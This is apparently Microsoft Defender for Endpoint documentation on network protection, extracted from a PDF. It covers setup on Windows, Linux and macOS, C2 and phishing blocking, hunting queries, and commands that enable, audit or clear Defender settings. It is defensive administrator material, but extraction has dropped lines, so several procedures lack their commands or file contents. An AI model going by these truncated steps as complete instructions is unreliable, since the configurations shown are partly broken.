Microsoft Edge. For processes other than Microsoft Edge and Internet Explorer,
web protection scenarios leverage network protection for inspection and
enforcement.
IP is supported for all three protocols (TCP, HTTP, and HTTPS (TLS)).
Only single IP addresses are supported (no CIDR blocks or IP ranges) in
custom indicators.
Encrypted URLs (full path) can only be blocked on first party browsers
(Internet Explorer, Edge).
Encrypted URLs (FQDN only) can be blocked in third party browsers (i.e. other
than Internet Explorer, Edge).
Full URL path blocks can be applied for unencrypted URLs.
There might be up to 2 hours of latency (usually less) between the time the action
is taken, and the URL and IP being blocked.
Watch this video to learn how Network protection helps reduce the attack surface of
your devices from phishing scams, exploits, and other malicious content.
https://www.microsoft.com/en-us/videoplayer/embed/RE4r4yZ?postJsllMsg=true
Requirements for network protection

Network protection requires Windows 10 or 11 (Pro or Enterprise), Windows Server
version 1803 or later, macOS version 11 or later, or Defender Supported Linux versions,
and Microsoft Defender Antivirus real-time protection.
ﾉ Expand table
Windows version Microsoft Defender Antivirus
Windows 10 version 1709 or later, Make sure that Microsoft Defender Antivirus real-time
Windows 11, Windows Server 1803 or protection and cloud-delivered protection are enabled
later (active)
Windows Server 2012 R2 and Platform Update version 4.18.2001.x.x or newer

Windows Server 2016 with the unified
agent
Why network protection is important

Network protection is a part of the attack surface reduction group of solutions in
Microsoft Defender for Endpoint. Network protection enables the network layer to block
URLs and IP addresses. Network protection can block URLs from being accessed by
using certain browsers and standard network connections. By default, network
protection guards your computers from known malicious URLs using the SmartScreen
feed, which blocks malicious URLs in a manner similar to SmartScreen in Microsoft Edge
browser. The network protection functionality can be extended to:
Block IP/URL addresses from your own threat intelligence (indicators)

Block unsanctioned services from Microsoft Defender for Cloud Apps
Block browser access to websites based on category (Web content filtering)
Network protection is a critical part of the Microsoft protection and response stack.
 Tip
For details about network protection for Windows Server, Linux, MacOS and Mobile
Threat Defense (MTD), see Proactively hunt for threats with advanced hunting.
Block Command and Control attacks

Command and Control (C2) server computers are used by malicious users to send
commands to systems previously compromised by malware. C2 attacks typically hide in
cloud-based services such as file-sharing and webmail services, enabling the C2 servers
to avoid detection by blending in with typical traffic.
C2 servers can be used to initiate commands that can:
Steal data
Control compromised computers in a botnet
Disrupt legitimate applications
Spread malware, such as ransomware
The network protection component of Defender for Endpoint identifies and blocks
connections to C2 infrastructures used in human-operated ransomware attacks, using
techniques like machine learning and intelligent indicator-of-compromise (IoC)
identification.
Network protection: C2 detection and remediation
In its initial form, ransomware is a commodity threat, pre-programmed and focused on

limited, specific outcomes (for example, encrypting a computer). However, ransomware
has evolved into a sophisticated threat that is human-driven, adaptive, and focused on
larger scale and more widespread outcomes, like holding an entire organization's assets
or data for ransom.
Support for Command and Control servers (C2) is a key part of this ransomware
evolution and is what enables these attacks to adapt to the environment they target.
Breaking the link to the command-and-control infrastructure stops the progression of
an attack to its next stage. For additional information about C2 detection and
remediation, see Detecting and remediating command and control attacks at the
network layer .
Network protection: New toast notifications
ﾉ Expand table
New mapping Response category Sources
phishing Phishing SmartScreen
malicious Malicious SmartScreen
command and control C2 SmartScreen
command and control COCO SmartScreen
malicious Untrusted SmartScreen
by your IT admin CustomBlockList

New mapping Response category Sources
by your IT admin CustomPolicy
７ Note
customAllowList does not generate notifications on endpoints.
New notifications for network protection determination

A new, publicly available capability in network protection utilizes functions in
SmartScreen to block phishing activities from malicious command and control sites.
When an end user attempts to visit a website in an environment in which network

protection is enabled, three scenarios are possible:
The URL has a known good reputation - In this case the user is permitted access
without obstruction, and there's no toast notification presented on the endpoint.
In effect, the domain or URL is set to Allowed.
The URL has an unknown or uncertain reputation - The user's access is blocked,
but with the ability to circumvent (unblock) the block. In effect, the domain or url is
set to Audit.
The URL has a known bad (malicious) reputation - The user is prevented from
access. In effect, the domain or url is set to Block.
Warn experience
A user visits a website:
If the url has an unknown or uncertain reputation, a toast notification will present
the user with the following options:
Ok - The toast notification is released (removed), and the attempt to access the
site is ended.
Unblock - The user will have access to the site for 24 hours; at which point the
block is reenabled. The user can continue to use Unblock to access the site until
such time that the administrator prohibits (blocks) the site, thus removing the
option to Unblock.
Feedback - The toast notification presents the user with a link to submit a ticket,
which the user can use to submit feedback to the administrator in an attempt to
justify access to the site.
７ Note
The images shown here for warn experience and block experience (below)
both list "blocked url" as example placeholder text; in a functioning
environment the actual url or domain will be listed.
Block experience
A user visits a website:
If the url has a bad reputation, a toast notification will present the user with the
following options:
Ok The toast notification is released (removed), and the attempt to access the
site is ended.
Feedback The toast notification presents the user with a link to submit a ticket,
which the user can use to submit feedback to the administrator in an attempt to
justify access to the site.

SmartScreen Unblock
With indicators in Defender for Endpoint, administrators can allow end users to bypass
warnings that are generated for some URLs and IPs. Depending on why the URL was
blocked, when a SmartScreen block is encountered it may offer the ability to unblock
the site for up to 24 hours. In such cases, a Windows Security toast notification will
appear, permitting the end-user to Unblock the URL or IP for the defined period of time.
Microsoft Defender for Endpoint administrators can configure SmartScreen Unblock

functionality in the Microsoft Defender portal using an "allow" indicator for IPs, URLs,
and domains.
See Create indicators for IPs and URLs/domains.
Using network protection

Network protection is enabled per device, which is typically done using your
management infrastructure. For supported methods, see Turn on network protection.
７ Note
Microsoft Defender Antivirus must be active to enable network protection.
You can enable network protection in Audit mode or Block mode. If you want to
evaluate the impact of enabling network protection before actually blocking IP
addresses or URLs, you can enable network protection in Audit mode for time to gather
data on what would be blocked. Audit mode logs when end users have connected to an
address or site that would otherwise have been blocked by network protection. Note
that in order for indicators of compromise (IoC) or Web content filtering (WCF) to work,
network protection must be in "Block mode"
For information about network protection for Linux and macOS see: Network protection
for Linux and Network protection for macOS.
Advanced hunting
If you're using advanced hunting to identify audit events, you'll have up to 30 days
history available from the console. See Advanced hunting.
You can find the audit events in Advanced hunting in the Defender for Endpoint portal
Audit events are in DeviceEvents with an ActionType of

ExploitGuardNetworkProtectionAudited . Blocks are shown with an ActionType of
ExploitGuardNetworkProtectionBlocked .
Here's an example query for viewing Network Protection events for third-party
browsers:
Kusto
DeviceEvents
|where ActionType in
('ExploitGuardNetworkProtectionAudited','ExploitGuardNetworkProtectionBlocke
d')

 Tip
These entries have data in the AdditionalFields column which gives you great info
around the action, if you expand AdditionalFields you can also get the fields:
IsAudit, ResponseCategory, and DisplayName.
Here's another example:
Kusto
DeviceEvents
|where ActionType contains "ExploitGuardNetworkProtection"
|extend ParsedFields=parse_json(AdditionalFields)
|project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName, IsAudit=tostring(ParsedFields.IsAudit),
ResponseCategory=tostring(ParsedFields.ResponseCategory),
DisplayName=tostring(ParsedFields.DisplayName)
|sort by Timestamp desc
The Response category tells you what caused the event, for example:
ﾉ Expand table
ResponseCategory Feature responsible for the event
CustomPolicy WCF
CustomBlockList Custom indicators
CasbPolicy Defender for Cloud Apps
Malicious Web threats
Phishing Web threats
For more information, see Troubleshoot endpoint blocks.
Note that Microsoft Defender SmartScreen events for the Microsoft Edge browser
specifically, needs a different query:
Kusto
DeviceEvents
| where ActionType == "SmartScreenUrlWarning"
| extend ParsedFields=parse_json(AdditionalFields)
| project DeviceName, ActionType, Timestamp, RemoteUrl,
InitiatingProcessFileName
You can use the resulting list of URLs and IPs to determine what would have been
blocked if the device was in block mode, and which feature blocked them. Review each
item on the list to identify URLS or IPs whether any are necessary to your environment. If
you find any entries that have been audited which are critical to your environment,
create an Indicator to allow them in your network. Allow URL / IP indicators take
precedence over any block.
Once you've created an indicator, you can look at resolving the underlying issue:
SmartScreen – request review

Indicator – modify existing indicator
MCA – review unsanctioned APP
WCF – request recategorization
Using this data you can make an informed decision on enabling Network protection in
Block mode. See Order of precedence for Network protection blocks.
７ Note
As this is a per-device setting, if there are devices that cannot move to Block mode
you can simply leave them on audit until you can rectify the challenge and you will
still receive the auditing events.
For information about how to report false positives see Report false positives.
For details on how to create your own Power BI reports, see Create custom reports using
Power BI.
Configuring network protection

For more information about how to enable network protection, see Enable network
protection. Use Group Policy, PowerShell, or MDM CSPs to enable and manage network
protection in your network.
After you've enabled network protection, you might need to configure your network or
firewall to allow the connections between your endpoint devices and the web services:
.smartscreen.microsoft.com
.smartscreen-prod.microsoft.com
Viewing network protection events

Network protection works best with Microsoft Defender for Endpoint, which gives you
detailed reporting into exploit protection events and blocks as part of alert investigation
scenarios.
When network protection blocks a connection, a notification is displayed from the

Action Center. Your security operations team can customize the notification with your
organization's details and contact information. In addition, individual attack surface
reduction rules can be enabled and customized to suit certain techniques to monitor.
You can also use audit mode to evaluate how network protection would impact your
Review network protection events in the

alert investigation scenarios. You can view these details in the Microsoft Defender portal
(https://security.microsoft.com ) in the alerts queue or by using advanced hunting. If
you're using audit mode, you can use advanced hunting to see how network protection
settings would affect your environment if they were enabled.
Review network protection events in Windows

Event Viewer
You can review the Windows event log to see events that are created when network
protection blocks (or audits) access to a malicious IP or domain:
1. Copy the XML directly.
2. Select OK.
This procedure creates a custom view that filters to only show the following events
related to network protection:
ﾉ Expand table
1125 Event when network protection fires in audit mode
1126 Event when network protection fires in block mode
Network protection and the TCP three-way

handshake
under DeviceNetworkEvents in the Microsoft Defender portal, even though the site was
blocked. DeviceNetworkEvents are reported from the TCP layer, and not from network
protection. After the three-way handshake has completed, access to the site is allowed
or blocked by network protection.
protection.

DeviceNetworkEvents action is logged, and its ActionType is listed as
that alert include both DeviceNetworkEvents and AlertEvidence. You can see that
the site was blocked, even though you also have a DeviceNetworkEvents item with
the ActionType of ConnectionSuccess .
Considerations for Windows virtual desktop

running Windows 10 Enterprise Multi-Session
Due to the multi-user nature of Windows 10 Enterprise, keep the following points in
mind:
1. Network protection is a device-wide feature and can't be targeted to specific user

sessions.
2. Web content filtering policies are also device-wide.
3. If you need to differentiate between user groups, consider creating separate

Windows Virtual Desktop host pools and assignments.
4. Test network protection in audit mode to assess its behavior before rolling out.
5. Consider resizing your deployment if you have a large number of users or a large
number of multi-user sessions.
Alternative option for network protection

For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or
newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909
and up, used in Windows Virtual Desktop on Azure, network protection for Microsoft
Edge can be enabled using the following method:
1. Use Turn on network protection and follow the instructions to apply your policy.
2. Execute the following PowerShell commands:
Set-MpPreference -AllowNetworkProtectionOnWinServer 1
Set-MpPreference -AllowNetworkProtectionDownLevel 1
Set-MpPreference -AllowDatagramProcessingOnWinServer 1
７ Note
In some cases, depending on your infrastructure, volume of traffic, and other

conditions, Set-MpPreference -AllowDatagramProcessingOnWinServer 1 can have an
effect on network performance.
Network protection for Windows Servers

Following is information specific to Windows Servers.
Verify that network protection is enabled
Verify whether network protection is enabled on a local device by using Registry Editor.
1. Select the Start button in the task bar and type regedit to open the Registry Editor.
2. Select HKEY_LOCAL_MACHINE from the side menu.
3. Navigate through the nested menus to SOFTWARE > Policies > Microsoft >
Windows defender > Windows Defender Exploit Guard > Network Protection.
(If the key is not present, navigate to SOFTWARE > Microsoft > Windows
Defender > Windows Defender Exploit Guard > Network Protection)
4. Select EnableNetworkProtection to see the current state of network protection on

the device:
0 = Off
1 = On (enabled)
2 = Audit mode
For additional information, see: Turn on network protection
Network protection suggestion
For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or
newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909
and up (used in Windows Virtual Desktop on Azure), there are additional registry keys
that must be enabled:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows
Defender Exploit Guard\Network Protection
AllowNetworkProtectionOnWinServer (dword) 1 (hex)

EnableNetworkProtection (dword) 1 (hex)
AllowNetworkProtectionDownLevel (dword) 1 (hex) - Windows Server 2012R2 and
Windows Server 2016 only
７ Note
Depending on your infrastructure, volume of traffic, and other conditions,

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
\NIS\Consumers\IPS - AllowDatagramProcessingOnWinServer (dword) 1 (hex)
can have an effect on network performance.
For additional information, see: Turn on network protection
Windows Servers and Windows Multi-session configuration

requires PowerShell
For Windows Servers and Windows Multi-session, there are additional items that you
must enable by using PowerShell cmdlets. For Windows Server 2012R2/2016 unified
MDE client, Windows Server version 1803 or newer, Windows Server 2019 or newer, and
Windows 10 Enterprise Multi-Session 1909 and up, used in Windows Virtual Desktop on
Azure.
1. Set-MpPreference -EnableNetworkProtection Enabled

2. Set-MpPreference -AllowNetworkProtectionOnWinServer 1
3. Set-MpPreference -AllowNetworkProtectionDownLevel 1
4. Set-MpPreference -AllowDatagramProcessingOnWinServer 1
７ Note
In some cases, depending on your infrastructure, volume of traffic, and other

conditions, Set-MpPreference -AllowDatagramProcessingOnWinServer 1 can have
an effect on network performance.
Network protection troubleshooting

Due to the environment where network protection runs, the feature might not be able
to detect operating system proxy settings. In some cases, network protection clients are
unable to reach the cloud service. To resolve the connectivity problem, configure a static
proxy for Microsoft Defender Antivirus.
Optimizing network protection performance

Network protection now has a performance optimization that allows Block mode to start
asynchronously inspecting long-lived connections, which might provide a performance
improvement and can also help with app compatibility problems. This optimization
capability is on by default. You can turn off this capability by using the following
PowerShell cmdlet:
Set-MpPreference -AllowSwitchToAsyncInspection $false

See also
Evaluate network protection | Undertake a quick scenario that demonstrates how
the feature works, and what events would typically be created.
Enable network protection | Use Group Policy, PowerShell, or MDM CSPs to enable
and manage network protection in your network.
Configuring attack surface reduction capabilities in Microsoft Intune
Network protection for Linux | To learn about using Microsoft Network protection
for Linux devices.
Network protection for macOS | To learn more about Microsoft Network protection
for macOS
 Tip
Feedback

Evaluate network protection
Article • 02/21/2024
Applies to:

Network protection helps prevent employees from using any application to access
dangerous domains that might host phishing scams, exploits, and other malicious
content on the Internet.
This article helps you evaluate network protection by enabling the feature and guiding
you to a testing site. The sites in this evaluation article aren't malicious. They're specially
created websites that pretend to be malicious. The site replicates the behavior that
would happen if a user visited a malicious site or domain.
Enable network protection in audit mode

Enable network protection in audit mode to see which IP addresses and domains might
be blocked. You can make sure it doesn't affect line-of-business apps, or get an idea of
how often blocks occur.
as administrator
PowerShell
Set-MpPreference -EnableNetworkProtection AuditMode
Visit a (fake) malicious domain

1. Open Internet Explorer, Google Chrome, or any other browser of your choice.
2. Go to https://smartscreentestratings2.net .
The network connection is allowed and a test message displays.


７ Note
Network connections can be successful even though a site is blocked by network

protection. To learn more, see Network protection and the TCP three-way
handshake.
Review network protection events in Windows

Event Viewer
To review apps that would have been blocked, open Event Viewer and filter for Event ID
1125 in the Microsoft-Windows-Windows Defender/Operational log. The following table
lists all network protection events.
ﾉ Expand table
Event ID Provide/Source Description
5007 Windows Defender (Operational) Event when settings are changed
1125 Windows Defender (Operational) Event when a network connection is audited
1126 Windows Defender (Operational) Event when a network connection is blocked
See also
Network protection
Network protection and the TCP three-way handshake

Enable network protection
Troubleshoot network protection
 Tip
Feedback

Turn on network protection
Article • 02/22/2023
Applies to:

Platforms
Windows
Linux (See Network protection for Linux)
macOS (See Network protection for macOS)
 Tip
Network protection helps to prevent employees from using any application to access
dangerous domains that may host phishing scams, exploits, and other malicious content
on the internet. You can audit network protection in a test environment to view which
apps would be blocked before enabling network protection.
Learn more about network filtering configuration options.
Check if network protection is enabled

Check if network protection has been enabled on a local device by using Registry editor.
1. Select the Start button in the task bar and type regedit to open Registry editor.
2. Choose HKEY_LOCAL_MACHINE from the side menu.
3. Navigate through the nested menus to SOFTWARE > Policies > Microsoft >
Windows Defender > Policy Manager.
If the Key is missing, Navigate to SOFTWARE > Microsoft > Windows Defender >
Windows Defender Exploit Guard > Network Protection.
4. Select EnableNetworkProtection to see the current state of network protection on
the device:
0, or Off
1, or On
2, or Audit mode

Enable network protection by using any of these methods:
PowerShell
Microsoft Intune
Group Policy
PowerShell
as administrator.
PowerShell
3. Optional: Enable the feature in audit mode using the following cmdlet:
PowerShell
Use Disabled instead of AuditMode or Enabled to turn off the feature.
Mobile device management (MDM)

Use the ./Vendor/MSFT/Policy/Config/Defender/EnableNetworkProtection configuration
service provider (CSP) to enable or disable network protection or enable audit mode.
Update Microsoft Defender antimalware platform to the latest version before you
enable or disable network protection or enable audit mode.
Microsoft Intune
Microsoft Defender for Endpoint Baseline method
1. Sign into the Microsoft Intune admin center (https://endpoint.microsoft.com ).

2. Go to Endpoint security > Security baselines > Microsoft Defender for Endpoint
Baseline.
3. Select Create a profile, then provide a name for your profile, and then select Next.
4. In the Configuration settings section, go to Attack Surface Reduction Rules > set
Block, Enable or Audit for Enable network protection. Select Next.
5. Select the appropriate Scope tags and Assignments as required by your
organization.
6. Review all the information, and then select Create.
Antivirus policy method

2. Go to Endpoint security > Antivirus
3. Select Create a policy
4. In the Create a policy flyout, choose Windows 10, Windows 11, and Windows
Server from the Platform list.
5. Choose Microsoft Defender Antivirus from the Profile list then choose Create
6. Provide a name for your profile, and then select Next.
7. In the Configuration settings section, select Disabled, Enabled (block mode) or
Enabled (audit mode) for Enable Network Protection, then select Next.
8. Select the appropriate Assignments and Scope tags as required by your
organization.
Configuration profile method

2. Go to Devices > Configuration profiles > Create profile.
3. In the Create a profile flyout, select Platform and choose the Profile Type as
Templates.
4. In the Template name, Choose Endpoint protection from the list of templates, and
then select Create.
5. Go to Endpoint protection > Basics, provide a name for your profile, and then
select Next.
6. In the Configuration settings section, go to Microsoft Defender Exploit Guard >

Network filtering > Network protection > Enable or Audit. Select Next.
7. Select the appropriate Scope tags, Assignments, and Applicability rules as

required by your organization. Admins can set more requirements.

Group Policy
Use the following procedure to enable network protection on domain-joined computers
or on a standalone computer.
1. On a standalone computer, go to Start and then type and select Edit group policy.
-Or-
On a domain-joined Group Policy management computer, open the Group Policy

Management Console , right-click the Group Policy Object you want to configure
and select Edit.

Microsoft Defender Exploit Guard > Network protection.
７ Note
On older versions of Windows, the group policy path may say "Windows
Defender Antivirus" instead of "Microsoft Defender Antivirus."
4. Double-click the Prevent users and apps from accessing dangerous websites
setting and set the option to Enabled. In the options section, you must specify one
of the following options:
Block - Users can't access malicious IP addresses and domains.

Disable (Default) - The Network protection feature won't work. Users won't
be blocked from accessing malicious domains.
Audit Mode - If a user visits a malicious IP address or domain, an event will
be recorded in the Windows event log. However, the user won't be blocked
from visiting the address.
） Important
To fully enable network protection, you must set the Group Policy option to
Enabled and also select Block in the options drop-down menu.
７ Note
Optional: Follow the steps in Check if network protection is enabled to verify
that your Group Policy settings are correct.

1. Open the Configuration Manager console.
2. Go to Assets and Compliance > Endpoint Protection > Windows Defender

Exploit Guard.
3. Select Create Exploit Guard Policy from the ribbon to create a new policy.
To edit an existing policy, select the policy, then select Properties from either
the ribbon or the right-click menu. Edit the Configure network protection
option from the Network Protection tab.
4. On the General page, specify a name for the new policy and verify the Network
protection option is enabled.
5. On the Network protection page, select one of the following settings for the
Configure network protection option:
Block
Audit
Disabled
6. Complete the rest of the steps, and save the policy.
7. From the ribbon, select Deploy to deploy the policy to a collection.
） Important
Once you deploy an Exploit Guard policy from Configuration Manager, the Exploit
Guard settings will not be removed from the clients if you remove the deployment.
Delete not supported is recorded in the Configuration Manager client's
ExploitGuardHandler.log if you remove the client's Exploit Guard deployment. The

following PowerShell script can be run under SYSTEM context to remove these
settings:
PowerShell
$defenderObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -

Class "MDM_Policy_Config01_Defender02" -Filter "InstanceID='Defender'
and ParentID='./Vendor/MSFT/Policy/Config'"
$defenderObject.AttackSurfaceReductionRules = $null
$defenderObject.AttackSurfaceReductionOnlyExclusions = $null
$defenderObject.EnableControlledFolderAccess = $null
$defenderObject.ControlledFolderAccessAllowedApplications = $null
$defenderObject.ControlledFolderAccessProtectedFolders = $null
$defenderObject.EnableNetworkProtection = $null
$defenderObject.Put()
$exploitGuardObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -

Class "MDM_Policy_Config01_ExploitGuard02" -Filter
"InstanceID='ExploitGuard' and ParentID='./Vendor/MSFT/Policy/Config'"
$exploitGuardObject.ExploitProtectionSettings = $null
$exploitGuardObject.Put()
See also
Network protection
Network protection for Linux
Network protection for macOS
 Tip
Feedback

Network protection for Linux
Article • 11/15/2023
Applies to:

） Important

Overview
Microsoft is bringing Network Protection functionality to Linux.
Network protection helps reduce the attack surface of your devices from Internet-based
events. It prevents employees from using any application to access dangerous domains
that may host:
phishing scams
exploits
other malicious content on the Internet
Network protection expands the scope of Microsoft Defender SmartScreen to block all
outbound HTTP(s) traffic that attempts to connect to low-reputation sources. The blocks
on outbound HTTP(s) traffic are based on the domain or hostname.
Web content filtering for Linux

You can use web content filtering for testing with Network protection for Linux. See Web
content filtering.
Known issues
Network Protection is implemented as a virtual private network (VPN) tunnel.
Advanced packet routing options using custom nftables/iptables scripts are
available.
Block/Warn UX isn't available
Customer feedback is being collected to drive further design improvements
７ Note
To evaluate the effectiveness of Linux Web Threat Protection, we recommend using

the Firefox browser which is the default for all the distributions.
Prerequisites
Licensing: Microsoft Defender for Endpoint tenant (can be trial) and platform
specific requirements found in Microsoft Defender for Endpoint for non-Windows
platforms
Onboarded Machines:
Minimum Linux version: For a list of supported distributions, see Microsoft
Microsoft Defender for Endpoint Linux client version: 101.78.13 -
insiderSlow(Preview)
Instructions
Deploy Linux manually, see Deploy Microsoft Defender for Endpoint on Linux manually
The following example shows the sequence of commands needed to the mdatp
package on ubuntu 20.04 for insiders-Slow channel.
Bash
https://packages.microsoft.com/config/ubuntu/20.04/insiders-slow.list
sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-insiders-
slow.list
sudo apt-get install gpg
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt install -y mdatp
Device Onboarding
To onboard the device, you must download the Python onboarding package for Linux
server from Microsoft Defender XDR -> Settings -> Device Management -> Onboarding
and run:
Bash
sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py
Validation
1. Check Network Protection has effect on always blocked sites:
http://smartscreentestratings2.net
https://smartscreentestratings2.net
2. Inspect diagnostic logs
Bash
sudo mdatp log level set --level debug

sudo tail -f /var/log/microsoft/mdatp/microsoft_defender_np_ext.log
To exit the validation mode

Disable network protection and restart the network connection:
Bash
sudo mdatp config network-protection enforcement-level --value disabled
Advanced configuration
By default, Linux network protection is active on the default gateway; routing and
tunneling are internally configured. To customize the network interfaces, change the
networkSetupMode parameter from the /opt/microsoft/mdatp/conf/ configuration file
and restart the service:
Bash
sudo systemctl restart mdatp

The configuration file also enables the user to customize:
proxy setting
SSL certificate stores
tunneling device name
IP
and more
The default values were tested for all distributions as described in Microsoft Defender

Also, make sure that in Microsoft Defender > Settings > Endpoints > Advanced
features that 'Custom network indicators' toggle is set enabled.
） Important
The above 'Custom network indicators' toggle controls Custom Indicators

enablement for ALL platforms with Network Protection support, including
Windows. Reminder that—on Windows—for indicators to be enforced you also
must have Network Protection explicitly enabled.
How to explore the features

1. Learn how to Protect your organization against web threats using web threat
protection.
Web threat protection is part of web protection in Microsoft Defender for

Endpoint. It uses network protection to secure your devices against web
threats.
2. Run through the Custom Indicators of Compromise flow to get blocks on the
Custom Indicator type.
3. Explore Web content filtering.
７ Note
If you are removing a policy or changing device groups at the same time, this
might cause a delay in policy deployment. Pro tip: You can deploy a policy
without selecting any category on a device group. This action will create an
audit only policy, to help you understand user behavior before creating a
block policy.
2.
4. Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps and your
network protection-enabled macOS devices will have endpoint policy enforcement
capabilities.
７ Note
Discovery and other features are currently not supported on these platforms.
Scenarios
The following scenarios are supported during public preview:
Web threat protection

Web threat protection is part of Web protection in Microsoft Defender for Endpoint. It
uses network protection to secure your devices against web threats. By integrating with
Microsoft Edge and popular third-party browsers like Chrome and Firefox, web threat
protection stops web threats without a web proxy. Web threat protection can protect
devices while they're on premises or away. Web threat protection stops access to the
following types of sites:
phishing sites
malware vectors
exploit sites
untrusted or low-reputation sites
sites you've blocked in your custom indicator list
For more information, see Protect your organization against web threat
Custom Indicators of Compromise

Indicator of compromise (IoCs) matching is an essential feature in every endpoint
protection solution. This capability gives SecOps the ability to set a list of indicators for
detection and for blocking (prevention and response).
Create indicators that define the detection, prevention, and exclusion of entities. You can
define the action to be taken as well as the duration for when to apply the action and
the scope of the device group to apply it to.
Currently supported sources are the cloud detection engine of Defender for Endpoint,
the automated investigation and remediation engine, and the endpoint prevention
engine (Microsoft Defender Antivirus).

For more information, see: Create indicators for IPs and URLs/domains.

Web content filtering is part of the Web protection capabilities in Microsoft Defender for
Endpoint and Microsoft Defender for Business. Web content filtering enables your
organization to track and regulate access to websites based on their content categories.
Many of these websites (even if they're not malicious) might be problematic because of
compliance regulations, bandwidth usage, or other concerns.
Configure policies across your device groups to block certain categories. Blocking a
category prevents users within specified device groups from accessing URLs associated
with the category. For any category that's not blocked, the URLs are automatically
audited. Your users can access the URLs without disruption, and you'll gather access
statistics to help create a more custom policy decision. Your users will see a block
notification if an element on the page they're viewing is making calls to a blocked
resource.
Web content filtering is available on the major web browsers, with blocks performed by
Windows Defender SmartScreen (Microsoft Edge) and Network Protection (Chrome,
Firefox, Brave, and Opera). For more information about browser support, see
Prerequisites.

For more information about reporting, see Web content filtering.

The Microsoft Defender for Cloud Apps / Cloud App Catalog identifies apps you would
want end users to be warned upon accessing with Microsoft Defender XDR for Endpoint,
and mark them as Monitored. The domains listed under monitored apps would be later
synced to Microsoft Defender XDR for Endpoint:
Within 10-15 minutes, these domains will be listed in Microsoft Defender XDR under
Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA (see details
at the end of this article).

See also
Web protection
Create indicators
 Tip
Feedback

Network protection for macOS
Article • 02/22/2024
Applies to:

Overview
Microsoft Network protection helps reduce the attack surface of your devices from
Internet-based events. It prevents employees from using any application to access
dangerous domains that might host:
phishing scams
exploits
other malicious content on the Internet
Network protection expands the scope of Microsoft Defender XDR SmartScreen to block
all outbound HTTP(s) traffic that attempts to connect to low-reputation sources. The
blocks on outbound HTTP(s) traffic are based on the domain or hostname.
Availability
Network Protection for macOS is now available for all Microsoft Defender for Endpoint
onboarded macOS devices that meet the minimum requirements. All of your currently
configured Network Protection and Web Threat Protection policies are enforced on
macOS devices where Network Protection is configured for block mode.
To roll out Network Protection for macOS, we recommend the following actions:
Create a device group for a small set of devices that you can use to test Network
Protection.
Evaluate the impact of Web Threat Protection, Custom Indicators of Compromise,
Web Content Filtering, and Microsoft Defender for Cloud Apps enforcement
policies that target those macOS devices where Network Protection is in Block
mode.
Deploy an audit or block mode policy to this device group and verify there are no
issues or broken workstreams.
Gradually deploy Network Protection to a larger set of devices until rolled out.
Current capabilities
Custom Indicators of Compromise on Domains and IPs.
Web Content Filtering support:
Block website categories scoped to device groups through policies created in
Policies are applied to browsers, including Chromium Microsoft Edge for
macOS.
Advanced Hunting - Network Events are reflected in the Machine Timeline, and
queryable in Advanced Hunting to aid security investigations.
Microsoft Defender for Cloud Apps:
Shadow IT discovery - Identify which apps are being used in your organization.
Block applications - Block entire applications (such as Slack and Facebook) from
being used in your organization.
Corporate VPN in tandem or side-by-side with Network Protection:
Currently, no VPN conflicts are identified.
If you do experience conflicts, you can provide feedback through the feedback
channel listed at the bottom of this page.
Known issues
Block/Warn UX isn't customizable and might require other look and feel changes.
(Customer feedback is being collected to drive further design improvements)
There's a known application incompatibility issue with VMware's "Per-App Tunnel"
feature. (This incompatibility might result in an inability to block traffic that goes
through the "Per-App Tunnel.")
There's a known application incompatibility issue with Blue Coat Proxy. (This
incompatibility might result in network layer crashes in unrelated applications
when both Blue Coat Proxy and Network Protection are enabled.)
Important notes
We don't recommend controlling network protection from System Preferences by
using the Disconnect button. Instead, use the mdatp command-line tool or JAMF /
Intune to control network protection for macOS.
To evaluate effectiveness of macOS web threat protection, we recommend trying it
in browsers other than Microsoft Edge for macOS (for example, Safari). Microsoft
Edge for macOS has built-in web threat protection that is enabled regardless of
whether the Mac network protection feature you're evaluating, is turned on or not.
７ Note
Microsoft Edge for macOS does not currently support web content filtering, custom
indicators, or other enterprise features. However, network protection will provide
this protection to Microsoft Edge for macOS if network protection is enabled.
Prerequisites
Licensing: Microsoft Defender XDR for Endpoint Plan 1 or Microsoft Defender XDR
for Endpoint Plan 2 (can be trial)
Onboarded Machines:
Minimum macOS version: 11
Product version 101.94.13 or later
Deployment instructions
Microsoft Defender XDR for Endpoint

Install the most recent product version through Microsoft AutoUpdate. To open
Microsoft AutoUpdate, run the following command from the Terminal:
Bash
open /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\

AutoUpdate.app
Configure the product with your organization information using the instructions in our
public documentation.
Network protection is disabled by default, but it can be configured to run in one of the
following modes (also called enforcement levels):
Audit: useful to make sure it doesn't affect line-of-business apps, or get an idea of
how often blocks occur
Block: network protection prevents connection to malicious websites
Disabled: all components associated with network protection are disabled
You can deploy this feature in one of the following ways: manually, through JAMF, or
through Intune. The following sections describe each of these methods in detail.
Manual deployment
To configure the enforcement level, run the following command from the Terminal:
Bash
mdatp config network-protection enforcement-level --value [enforcement-

level]
For example, to configure network protection to run in blocking mode, execute the
following command:
Bash
mdatp config network-protection enforcement-level --value block
To confirm that network protection has been started successfully, run the following
command from the Terminal, and verify that it prints "started":
Bash
mdatp health --field network_protection_status
JAMF deployment
A successful JAMF deployment requires a configuration profile to set the enforcement

level of network protection. After you create this configuration profile, assign it to the
devices where you want to enable network protection.
Configure the enforcement level
Note: If you've already configured Microsoft Defender XDR for Endpoint on Mac using
the instructions listed here, then update the plist file you previously deployed with the
content listed below and redeploy it from JAMF.
1. In Computers > Configuration Profiles, select Options > Applications & Custom
Settings
2. Select Upload File (PLIST file)
3. Set preference domain to com.microsoft.wdav
4. Upload the following plist file
XML
<dict>
<key>networkProtection</key>
<dict>
</dict>
</dict>
</plist>
Intune deployment
